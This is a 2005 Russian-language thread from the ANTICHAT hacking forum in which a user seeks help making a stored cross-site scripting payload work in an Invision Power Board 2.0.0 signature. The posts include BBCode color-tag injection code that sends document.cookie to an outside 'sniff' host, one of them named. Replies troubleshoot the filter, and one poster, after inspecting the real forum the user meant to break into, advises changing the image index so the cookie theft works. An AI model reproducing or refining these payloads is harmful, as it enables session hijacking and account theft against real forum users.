HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Это фильтр или что? (проблема со вставкой скрипта в Ipb 2.0.0)
  #1  
Старый 26.04.2005, 17:40
Telepuz
Новичок
Регистрация: 30.03.2005
Сообщений: 19
С нами: 11113534

Репутация: 0
По умолчанию Это фильтр или что? (проблема со вставкой скрипта в Ipb 2.0.0)

Код:
<div class="postcolor" style='padding:4px;'><span style='color:<img src='http://aaaaa/=`aaajpg' border='0' alt='user posted image' />'>` style=background:url(javascript:document.images[68].src=&quot;http://*******/sniff.jpg?&quot;+document.cookie); </span></div>
Это получается поле вставки скрипта

Код:
[COLOR=]` style=background:url(javascript:document.images[68].src="http://*******/sniff.pg?"+document.cookie); [/COLOR]
перед style появляется />'

Как можно это обойти?
 

  #2  
Старый 26.04.2005, 17:43
KEZ
Guest
Сообщений: n/a
С нами:

Репутация:
По умолчанию

замени [COLOR=] на [color=#aaaaaa]
если не получится, назови версию форума... если это форум...
я подумаю
 

  #3  
Старый 26.04.2005, 18:02
Telepuz
Новичок
Регистрация: 30.03.2005
Сообщений: 19
С нами: 11113534

Репутация: 0
По умолчанию

Invision Power Board 2.0.0

Код:
<div class="signature" style="padding: 5px;">
<span style='color:#aaaaaa
<iМg src='http://aaaaa/=`aaajpg' border='0' alt='user posted image' 
/>'>`style=background:url(javascript:document.images
[68].src=&quot;http://armadaplus.com/css/show.gif?&quot;+document.cookie);</sрan></div>
Это получается после присвоения цвета.
Т.е получается так, что подпись не отображается, по идее должен работать скрипт. Но опять появлятеся />
 

  #4  
Старый 26.04.2005, 20:30
coyl
Участник форума
Регистрация: 14.01.2005
Сообщений: 127
С нами: 11220348

Репутация: 5
По умолчанию

это потому что у тебя опера, а опера не видит знак `. то есть в эксплорере это подействует, а в опере - нет =) вот и всё =)
 

  #5  
Старый 26.04.2005, 21:15
Telepuz
Новичок
Регистрация: 30.03.2005
Сообщений: 19
С нами: 11113534

Репутация: 0
По умолчанию

нифига =)
Опера никак не вставит />. Это делает форум. Тем более, что проверяю я вставки в Ie.
 

  #6  
Старый 30.04.2005, 22:33
Telepuz
Новичок
Регистрация: 30.03.2005
Сообщений: 19
С нами: 11113534

Репутация: 0
По умолчанию

Не отключал он теги. Стандартные теги работаю же и я об этом говорил. Так что не пори чушь.
 

  #7  
Старый 01.05.2005, 00:17
Super White Jordan
Banned
Регистрация: 28.04.2005
Сообщений: 3
С нами: 11071402

Репутация: 0
По умолчанию

Чушь мелишь ссылку давай. Если у тебя в теле сообщения не работает, (Хотя чисто глядя на html который ты дал всё работает) то фильтры стоят.
 

  #8  
Старый 03.05.2005, 04:27
Super White Jordan
Banned
Регистрация: 28.04.2005
Сообщений: 3
С нами: 11071402

Репутация: 0
По умолчанию

Цитата:
Сообщение от Telepuz  
Не отключал он теги. Стандартные теги работаю же и я об этом говорил. Так что не пори чушь.
Ну вот Я всё проверил, судя по тому коду который ты тут дал на форуме, он теги в подписи кроме картинки отключил. Откуда Я знаю что он теги в подписи отключил? Ну потому что Я прочитал твой html код который ты сам и дал!!!! Так что год, врать не умеет. =)))

Теперь, ты мне в приват прислал ссылку на тот форум который ты хотел взломать.

Ну так вот, Я там всё проверил, и в подписи и в сообщении фильров нету там всё работает. У тебя снифф не работал потому что у тебя 68 в коде. Это Админы в статье специально зделали чтобы Ламеры (В этом случае к сожалению как ты, но только не обижайся=) ) не ломали форумы. =))))))

Так что поменяй на 1. =))))
 

  #9  
Старый 03.05.2005, 00:26
Telepuz
Новичок
Регистрация: 30.03.2005
Сообщений: 19
С нами: 11113534

Репутация: 0
По умолчанию

Тема закрыта, всем спасибо =)
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблема со сплоитом для ipb 2.0.0 Lord Nikon Уязвимости CMS / форумов 4 22.11.2005 15:51
Invision Power Board 2.0.0 - проблема со вставкой скрипта. Telepuz Уязвимости CMS / форумов 3 05.04.2005 13:49
помогите со вставкой скрипта kviv С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 5 29.03.2005 07:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...